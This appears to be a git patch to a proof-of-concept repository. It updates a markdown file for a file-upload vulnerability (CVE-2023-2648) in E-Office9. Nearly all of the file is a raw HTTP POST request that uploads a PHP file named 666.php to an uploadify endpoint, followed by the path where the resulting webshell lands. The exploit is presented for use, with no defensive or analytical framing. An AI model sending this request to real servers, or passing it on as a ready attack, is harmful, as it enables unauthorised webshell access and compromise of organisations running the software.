From 070ef5f3bb5fb4fbac6f4bbfa2406adee4c2fcc8 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Fri, 8 Dec 2023 22:38:18 +0800 Subject: [PATCH] =?UTF-8?q?Update=20=E6=9F=90=E5=BE=AEE-Office9=E6=96=87?= =?UTF-8?q?=E4=BB=B6=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E=20CVE-2023-2648.m?= =?UTF-8?q?d?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 某微E-Office9文件上传漏洞 CVE-2023-2648.md | 28 ++++++++++++++++------ 1 file changed, 21 insertions(+), 7 deletions(-) diff --git a/某微E-Office9文件上传漏洞 CVE-2023-2648.md b/某微E-Office9文件上传漏洞 CVE-2023-2648.md index 9616cd8..94c95a6 100644 --- a/某微E-Office9文件上传漏洞 CVE-2023-2648.md +++ b/某微E-Office9文件上传漏洞 CVE-2023-2648.md @@ -2,18 +2,32 @@ ``` POST /inc/jquery/uploadify/uploadify.php HTTP/1.1 -Host: 192.168.233.10:8082 -User-Agent: test +Host: :8085 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.5993.90 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 Connection: close -Content-Length: 493 -Accept-Encoding: gzip -Content-Type: multipart/form-data +Content-Type: multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85 +Content-Length: 491 -------WebKitFormBoundarydRVCGWq4Cx3Sq6tt +--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85 Content-Disposition: form-data; name="Filedata"; filename="666.php" Content-Type: application/octet-stream +--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85-- +--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85 +Content-Disposition: form-data; name="file"; filename="" +Content-Type: application/octet-stream -------WebKitFormBoundarydRVCGWq4Cx3Sq6tt +--25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85-- +``` +![2070a628d476b95724b6b017a3430a45](https://github.com/wy876/POC/assets/139549762/ea43a9b8-d146-49ae-86ce-f28e5b15c185) + +webshell路径 +``` +http://10.211.55.3:8082/attachment/1727543347/666.php ```